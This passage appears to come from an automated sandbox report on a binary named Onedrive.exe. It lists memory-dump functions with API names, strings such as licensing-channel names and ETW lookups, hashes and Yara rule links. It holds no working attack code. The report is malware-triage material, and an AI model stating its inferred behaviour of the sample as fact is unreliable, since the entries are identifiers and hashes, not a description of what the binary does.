                                                    • String ID: create_environment$minkernel\crts\ucrt\src\desktopcrt\env\environment_initialization.cpp$minkernel\crts\ucrt\src\desktopcrt\env\environment_initialization.cpp$s$traits::tcscpy_s(variable.get(), required_count, source_it)
                                                    • API String ID: 2249381636-3310917920
                                                    • Opcode ID: 18ac9dd3f81624684d7964865a5f95cb11a2ae88c221e9388e8694d30366c2d7
                                                    • Instruction ID: ea42cc42d91e9ae0ec8c61b93d21505dc2b404ac3cd921eedbff0b91078047b6
                                                    • Opcode Fuzzy Hash: 18ac9dd3f81624684d7964865a5f95cb11a2ae88c221e9388e8694d30366c2d7
                                                    • Instruction Fuzzy Hash: 1551FE2272CA8191E750EB16E4617AAB760FB80780F910036F69E5BBEEDF3CD544CB40
                                                    Function 00007FFDF3B05ED0 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 125memoryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    • minkernel\crts\ucrt\src\appcrt\locale\getstringtypea.cpp, xrefs: 00007FFDF3B05FD4
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::details::_$CriticalLock::_ReentrantScoped_lockScoped_lock::~_$ComputeMallocaSchedulerScheduler::_Size$AllocaByteCharMarkMultiStringTypeWide_freea_crtnew[]
                                                    • String ID: minkernel\crts\ucrt\src\appcrt\locale\getstringtypea.cpp
                                                    • API String ID: 3292198129-24854585
                                                    • Opcode ID: 71fa810742a88bba194b3d7f30742c70f253489877922a25d7cad75b65da90a9
                                                    • Instruction ID: f3b370861e8f6e00d6a199368ba381656de038675bbc79c28b2f8b6fc2813df5
                                                    • Opcode Fuzzy Hash: 71fa810742a88bba194b3d7f30742c70f253489877922a25d7cad75b65da90a9
                                                    • Instruction Fuzzy Hash: 4F51F872A1C68186E760DB15E461BAAB7A0EB84380F914036F6DE5BAE9DF3CD444CF40
                                                    Function 00007FF63EA1A698 Relevance: 18.1, APIs: 1, Strings: 11, Instructions: 111COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: _wcsicmp
                                                    • String ID: ENVIRONMENT$OEM_COA_NSLP$OEM_COA_SLP$OEM_DM$OEM_SLP$RETAIL$TIMEBASED_EVAL$TIMEBASED_PROMO$TIMEBASED_SUB$TIMEBASED_TRIAL$VOLUME_KMS
                                                    • API String ID: 2081463915-1302943250
                                                    • Opcode ID: fa7f94e61f269ecb3e1ff0f2dd14df86dbe6a502da5c08984cef1d8c0c194d74
                                                    • Instruction ID: 9d03123aae59f87723028d9d6dbb0efc0380d8ba776fe07f3150e98004fa5e1e
                                                    • Opcode Fuzzy Hash: fa7f94e61f269ecb3e1ff0f2dd14df86dbe6a502da5c08984cef1d8c0c194d74
                                                    • Instruction Fuzzy Hash: 2651F4B1A0AB4A8AE7009F52E8801A533E4BBB4350F45053AE94CE3360EF3CE55DE760
                                                    Function 00007FFDF3B06360 Relevance: 17.9, APIs: 4, Strings: 6, Instructions: 389COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: swap_c
                                                    • String ID: %ls$base != nullptr || num == 0$comp != nullptr$minkernel\crts\ucrt\src\appcrt\stdlib\qsort.cpp$qsort$width > 0
                                                    • API String ID: 1232431964-1732429825
                                                    • Opcode ID: 4a3968a17c66915b21523281d7ef98170aa3125a496ee0fe839a4808240de0f2
                                                    • Instruction ID: 97c225aaa31d5d4a701db6f970b4eeec619e7f532bcf95b99e130d0260db1c5b
                                                    • Opcode Fuzzy Hash: 4a3968a17c66915b21523281d7ef98170aa3125a496ee0fe839a4808240de0f2
                                                    • Instruction Fuzzy Hash: E5220A76B0DB8585DB608B56F4A076AB7A0F788790F510036EADD9BBACDF7CD4408B40
                                                    Function 00007FF63EA183D0 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 139COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: ExecuteShell$CreateFolderFreeFromItemKnownListObjectTaskmemset
                                                    • String ID: %systemroot%\system32\changepk.exe$p$page=SettingsPageActivate$windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel
                                                    • API String ID: 3005131752-2606238965
                                                    • Opcode ID: d4ab3d875fad306f59177a10c0067e858f47508aeac32058b376bfd7646115ab
                                                    • Instruction ID: e89fb5a2db078a144a2c5db10e6c01740de23d2457fc1c9987a8097ecf64ad85
                                                    • Opcode Fuzzy Hash: d4ab3d875fad306f59177a10c0067e858f47508aeac32058b376bfd7646115ab
                                                    • Instruction Fuzzy Hash: CC614E32A08B42C6EB548B95E4403B977A0FBA8754F444536FA4E97B64DF3CE44CE720
                                                    Function 00007FFDF3AF72C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 77COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::details::__invoke_watson_if_error$CriticalLock::_ReentrantSchedulerScheduler::_Scoped_lockScoped_lock::~___crt_unique_heap_ptr
                                                    • String ID: copy_and_add_argument_to_buffer$minkernel\crts\ucrt\src\appcrt\startup\argv_wildcards.cpp$minkernel\crts\ucrt\src\appcrt\startup\argv_wildcards.cpp$traits::tcsncpy_s( argument_buffer.get() + directory_length, required_count - directory_length, file_name, file_name_count)$traits::tcsncpy_s(argument_buffer.get(), required_count, directory, directory_length)
                                                    • API String ID: 3160871131-1477255430
                                                    • Opcode ID: 56b21e0973dc36537610673c69a775868eecb0e10eaa6e6bc507c90a404b413b
                                                    • Instruction ID: a58f4579341b4575e0f8540526eb9ceb6716af20ace3d6f24e5fb6e1d849f066
                                                    • Opcode Fuzzy Hash: 56b21e0973dc36537610673c69a775868eecb0e10eaa6e6bc507c90a404b413b
                                                    • Instruction Fuzzy Hash: 66413D7261CA8691DB10DF21E4607AAB360FB80394F910236E6ED5BAEDDF3CD145CB40
                                                    Function 00007FF63EA11130 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 54libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$HandleModule
                                                    • String ID: EtwEventEnabled$EtwEventRegister$EtwEventUnregister$EtwEventWrite$ntdll.dll
                                                    • API String ID: 667068680-1838325978
                                                    • Opcode ID: ba68fdd84bba215f0e08b4479e2c359e52c1883009fe3d1f84edea0320486613
                                                    • Instruction ID: 12e447b9ca4b76c4bb8dda6f65a22f8deab11b21e1a325b3f6a3291a0cf655e4
                                                    • Opcode Fuzzy Hash: ba68fdd84bba215f0e08b4479e2c359e52c1883009fe3d1f84edea0320486613
                                                    • Instruction Fuzzy Hash: 5931D761919A8782EB009B92E88437467E0FBBA715F405235E80ED63A4DF7CE08CE761
                                                    Function 00007FFDF3AF2BD0 Relevance: 16.2, APIs: 1, Strings: 8, Instructions: 425stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: strrchr
                                                    • String ID: %ls$a$d$fp_format_a$minkernel\crts\ucrt\src\appcrt\convert\cvt.cpp$p$p$result_buffer_count > static_cast<size_t>(1 + 4 + precision + 6)
                                                    • API String ID: 3418686817-2728534095
                                                    • Opcode ID: 17bfb08b7208d47e0b63ac4dfe94d956d99bbbadb31a0d70de527a98a45ae178
                                                    • Instruction ID: a65e8e6f9dfc2dd7dcd0f0017bf40eda2b56f2f0e884b25fe02ded21e91fba99
                                                    • Opcode Fuzzy Hash: 17bfb08b7208d47e0b63ac4dfe94d956d99bbbadb31a0d70de527a98a45ae178
                                                    • Instruction Fuzzy Hash: 42222B3260DBC585DBB18B6AE4907AEB7A0E784790F104026DADD9BB9DDF3CD445CB10
                                                    Function 00007FFDF3AF3600 Relevance: 16.0, APIs: 2, Strings: 7, Instructions: 238COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: _aligned_msize_invoke_watson_if_error
                                                    • String ID: %ls$d$e+000$fp_format_e_internal$minkernel\crts\ucrt\src\appcrt\convert\cvt.cpp$result_buffer_count > static_cast<size_t>(3 + (precision > 0 ? precision : 0) + 5 + 1)$strcpy_s( p, result_buffer_count == (static_cast<size_t>(-1)) ? result_buffer_count : result_buffer_count - (p - result_buffer), "
                                                    • API String ID: 1871870440-2583523412
                                                    • Opcode ID: aa62fee06007f48e728819eef63ab2c458d1392a8ffd5e289f31ac39b7df481c
                                                    • Instruction ID: f31ab7f4a6eccc286a09d49abadc95fd59a412ac3a717f8a0101c65589050222
                                                    • Opcode Fuzzy Hash: aa62fee06007f48e728819eef63ab2c458d1392a8ffd5e289f31ac39b7df481c
                                                    • Instruction Fuzzy Hash: C8C11C7261DBC58AD7A0CB1AE4A076AB7A0F785784F405025EADE8BB99CF3CD444CB40
                                                    Function 00007FF63EA1597C Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 176memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcess$DirectoryErrorLastSystem
                                                    • String ID: Tapi32.dll
                                                    • API String ID: 2626721824-1902342089
                                                    • Opcode ID: 42523e2f3836d451c6142b21fa8a96e0ed7b2c118e00aa92d39bf02b790cea9c
                                                    • Instruction ID: 616cdf9623b99d018736b86743a0553cc352b2d93c1f7f65f6ef7e7cdfd99103
                                                    • Opcode Fuzzy Hash: 42523e2f3836d451c6142b21fa8a96e0ed7b2c118e00aa92d39bf02b790cea9c
                                                    • Instruction Fuzzy Hash: 81719331B1864386EB549FA2A4441BA67A1FFA4784F548035FA4ED7794EF3CE40DA720
                                                    Function 00007FF63EA12EE0 Relevance: 15.1, APIs: 10, Instructions: 146memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$Free$Process$DirectSelect@StringTouch$AllocDirectoryErrorIndex@LastSelectionString@System
                                                    • String ID:
                                                    • API String ID: 796372636-0
                                                    • Opcode ID: 224721544ba5d1b1ccbc45791493ce61aa77e4a84b6f17a629e37a6cd94b57d0
                                                    • Instruction ID: f9c3d761232773c08752b041f009ac4ae76782f9688df7144a7f417cf3b737cf
                                                    • Opcode Fuzzy Hash: 224721544ba5d1b1ccbc45791493ce61aa77e4a84b6f17a629e37a6cd94b57d0
                                                    • Instruction Fuzzy Hash: B0518422A08A4287E6119F62D450279B7A1FFB9B84F0A9135EE4E92754DF3CF4499320
                                                    Function 00007FF63EA13AFC Relevance: 15.1, APIs: 10, Instructions: 133memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcess$AllocStringmemmove
                                                    • String ID:
                                                    • API String ID: 62646686-0
                                                    • Opcode ID: 611d1cda0b8a6a4730dab94e1e50fdd8b83e19467ea75b13cbd837236330efe6
                                                    • Instruction ID: 61c1a252c75f688962e3cbd77424cecff34fb1d81c28031b9f546ea3cb86eb20
                                                    • Opcode Fuzzy Hash: 611d1cda0b8a6a4730dab94e1e50fdd8b83e19467ea75b13cbd837236330efe6
                                                    • Instruction Fuzzy Hash: 83517931A0878687E6149F93A540239BAA1FFA9BC1F0AC138EE5E97755DF3CF44D9210
                                                    Function 00007FFDF3AD6D30 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 214COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Frame$Handler3::is$EmptyExceptFac_nodeFac_node::_Handler3::getStateTypesUnwind__except_validate_context_record_guard_icall_checks_enforcedstd::_
                                                    • String ID: csm$csm
                                                    • API String ID: 1491283442-3733052814
                                                    • Opcode ID: 9c47b632ef7cd2abb5942c8bc3ac3151e4cb6ba523e81b1d5f0fbc59ecad3f66
                                                    • Instruction ID: 6e081a35895897dcf8c801ed50752d94bdeff71805ac20dcaa428a2c314875a9
                                                    • Opcode Fuzzy Hash: 9c47b632ef7cd2abb5942c8bc3ac3151e4cb6ba523e81b1d5f0fbc59ecad3f66
                                                    • Instruction Fuzzy Hash: 52B1B636A08BC185EB709B56E4507AEB7A1FBC4780F415136EA9D6BBEDCF2CD4448B00
                                                    Function 00007FFDF3AFAE20 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 191COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %ls$("Invalid signal or error", 0)$minkernel\crts\ucrt\src\appcrt\misc\signal.cpp$raise
                                                    • API String ID: 0-1223553036
                                                    • Opcode ID: e58e9fe811afdfae9308997248f27fe0ad1012204da1e47ecf85e2e0864857f0
                                                    • Instruction ID: 58f7dd47133807d0bba5e15956f775cd665f2f4da700b7bbbfa78b616842c0ed
                                                    • Opcode Fuzzy Hash: e58e9fe811afdfae9308997248f27fe0ad1012204da1e47ecf85e2e0864857f0
                                                    • Instruction Fuzzy Hash: E8A11B32A1C7C186E7609B66E460B6AB7A0FB85784F014036EA9E5BBDDDF3CD444CB50
                                                    Function 00007FFDF3AF5620 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 133COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::details::_SchedulerScheduler::_$__crt_unique_heap_ptrnew[]
                                                    • String ID: %ls$minkernel\crts\ucrt\src\appcrt\stdio\_sftbuf.cpp$minkernel\crts\ucrt\src\appcrt\stdio\_sftbuf.cpp$public_stream != nullptr
                                                    • API String ID: 1578314805-3092436121
                                                    • Opcode ID: fab107f0d01f61d73088b446f29e6a40f7aa2fc2ebc6ab533c8737ae29e49a99
                                                    • Instruction ID: 3a3b8725d037ee59b7ec308ddb2c9b6e8e0fe24cc706013c98214a7cd89cb9d1
                                                    • Opcode Fuzzy Hash: fab107f0d01f61d73088b446f29e6a40f7aa2fc2ebc6ab533c8737ae29e49a99
                                                    • Instruction Fuzzy Hash: 65510C22B28A8191EB50DB12E471BBEB7A4FF94780F811131E6AE5B7DADF2CD544C740
                                                    Function 00007FFDF3AE8873 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 132COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::details::_$SchedulerScheduler::___crt_unique_heap_ptr$type_info::_name_internal_method$CriticalLock::_ReentrantScoped_lockScoped_lock::~_
                                                    • String ID: C:\Users\user\AppData\Local\Temp\Onedrive.exe
                                                    • API String ID: 930568095-88727064
                                                    • Opcode ID: c197946b17308473d5385c035a85cd2ffa56f7ec18cff5904e093d1f0731d030
                                                    • Instruction ID: 8c2830c28eed0edf74550ad424cc1f8767eef7a717e9b0578a2f633c471192b3
                                                    • Opcode Fuzzy Hash: c197946b17308473d5385c035a85cd2ffa56f7ec18cff5904e093d1f0731d030
                                                    • Instruction Fuzzy Hash: 5061FA7261CA8186E750DB16E4617AAB3A4FB80740F414136E69D9AAEADF3CD544CB40
                                                    Function 00007FFDF3AED080 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 89COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • __vcrt_lock.LIBVCRUNTIMED ref: 00007FFDF3AED142
                                                      • Part of subcall function 00007FFDF3AF6620: EnterCriticalSection.KERNEL32(?,?,?,?,00007FFDF3AE8375,?,?,?,?,00007FFDF3AE8062), ref: 00007FFDF3AF6641
                                                    • __vcrt_lock.LIBVCRUNTIMED ref: 00007FFDF3AED202
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: __vcrt_lock$CriticalEnterSection
                                                    • String ID: %ls$_CrtIsValidHeapPointer(block)$_msize_dbg$block != nullptr$is_block_type_valid(header->_block_use)$minkernel\crts\ucrt\src\appcrt\heap\debug_heap.cpp
                                                    • API String ID: 3216741998-890774455
                                                    • Opcode ID: d2e18c4f5006e9fd8889e5d5fa9a9eef759e1c481ae9fff440f1545f77c3845c
                                                    • Instruction ID: 977688482d034083f2ab27011b56b3b50b41a39d7fa0f0fb45f2fd2edbff6149
                                                    • Opcode Fuzzy Hash: d2e18c4f5006e9fd8889e5d5fa9a9eef759e1c481ae9fff440f1545f77c3845c
                                                    • Instruction Fuzzy Hash: 67418B31B18B4295E760AB22E471B6A77A0FB84354F821536EABD5B7DDDF3CD6808700
                                                    Function 00007FF63EA1C4FC Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 56libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(?,?,?,?,00000000,00007FF63EA1288B), ref: 00007FF63EA1C512
                                                    • GetLastError.KERNEL32(?,?,?,?,00000000,00007FF63EA1288B), ref: 00007FF63EA1C526
                                                    • GetProcAddress.KERNEL32(?,?,?,?,00000000,00007FF63EA1288B), ref: 00007FF63EA1C559
                                                    • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,00000000,00007FF63EA1288B), ref: 00007FF63EA1C56F
                                                    • FreeLibrary.KERNEL32(?,?,?,?,00000000,00007FF63EA1288B), ref: 00007FF63EA1C5AF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
